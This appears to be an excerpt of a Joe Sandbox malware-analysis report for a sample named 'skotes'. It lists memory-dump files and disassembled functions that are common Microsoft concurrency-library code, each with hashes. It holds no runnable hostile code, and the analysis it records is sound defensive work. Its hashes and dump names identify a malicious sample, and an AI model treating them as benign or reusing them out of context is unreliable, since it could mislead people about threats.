Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: 2339fa40c2b759e92c0178da1301f90e62942c3e6d41dad50bd4c6812f2ca6b4
Instruction ID: 519ee7f8da5f94745c6be54286a3a9fdb6776ca4fda23ecca7843a3b732e7e83
Opcode Fuzzy Hash: 2339fa40c2b759e92c0178da1301f90e62942c3e6d41dad50bd4c6812f2ca6b4
Instruction Fuzzy Hash: F621B3719456089FDB04EFA4D882EADB7F0EF05310F204069F111AB2E3EB31AE06DB51

Function 00C0A026 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00C0A069
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00C0A07F
Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00C0A0CB

Part of subcall function 00C0AB41: List.LIBCONCRT ref: 00C0AB77

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00C0A0DB

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionHardwareProxy::Scheduler$AffinityAffinity::CoreCountCurrentFixedIncrementListResourceResource::
String ID:
API String ID: 4213627143-0
Opcode ID: 95f6f3e04bc30c2c56652e178bef781f6c890df816116e37bc92e839a086442b
Instruction ID: 63d770fb975049713a71bbfad66c29fd92a9cb24d93d8a761346b897df4be6f1
Opcode Fuzzy Hash: 95f6f3e04bc30c2c56652e178bef781f6c890df816116e37bc92e839a086442b
Instruction Fuzzy Hash: F7218C315007189FCB25EF65D9918AAF3F9FF48710B004A5EE443A76A1DB34F905DBA2

Function 00C04885 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00C04893
ListArray.LIBCONCRT ref: 00C048A5

Part of subcall function 00C05555: _InternalDeleteHelper.LIBCONCRT ref: 00C05564

ListArray.LIBCONCRT ref: 00C048AF
_InternalDeleteHelper.LIBCONCRT ref: 00C048C8

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 59c586bf22ee40d60db68020848831393cb1776e95ab72bcb65b5fa58c8035d4
Instruction ID: 7bfa14cf73a8f722595406f73f90f5a4f3a9e693dcf23d5f0af3b16cbcbe5e2b
Opcode Fuzzy Hash: 59c586bf22ee40d60db68020848831393cb1776e95ab72bcb65b5fa58c8035d4
Instruction Fuzzy Hash: B201D671700521BFCA19BBA4C8C6E7FB76BBF447107000929FA0497696DB20EC25DBA0

Function 00C0EE5C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00C0EE6A
ListArray.LIBCONCRT ref: 00C0EE7C

Part of subcall function 00C0EF29: _InternalDeleteHelper.LIBCONCRT ref: 00C0EF3B

ListArray.LIBCONCRT ref: 00C0EE86
_InternalDeleteHelper.LIBCONCRT ref: 00C0EE9F

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: c23f4856fabf270b066f75f53d0d095c1ff781d229eb294e961ca7fddd2f915b
Instruction ID: 689a1aec5675ba35dbd944668559e3affea8919d352952b43d534f1fd95db46c
Opcode Fuzzy Hash: c23f4856fabf270b066f75f53d0d095c1ff781d229eb294e961ca7fddd2f915b
Instruction Fuzzy Hash: 4301F931340525BFCB257BA4C8C6D7EBB6ABF85710B040969F51497692CB60FC26D6D0

Function 00C0D0B7 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00C0D0C5
ListArray.LIBCONCRT ref: 00C0D0D7

Part of subcall function 00C0C6B2: _InternalDeleteHelper.LIBCONCRT ref: 00C0C6C4

ListArray.LIBCONCRT ref: 00C0D0E1
_InternalDeleteHelper.LIBCONCRT ref: 00C0D0FA

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 8e82617df74c535b4aba1c86e243787e0b7b66a9049b2f5f521176abc5a35fba
Instruction ID: 77753b43da20e253bf7f497fa3127c6f895a4a36bc2b646947d442ac06646856
Opcode Fuzzy Hash: 8e82617df74c535b4aba1c86e243787e0b7b66a9049b2f5f521176abc5a35fba
Instruction Fuzzy Hash: FF01F931300521BFCA357BA4C9D6D7DB76ABF447107000525F50597692DF61EC66E690

Function 00C133C1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00C133DB
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00C133EF
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00C13407
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C1341F

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
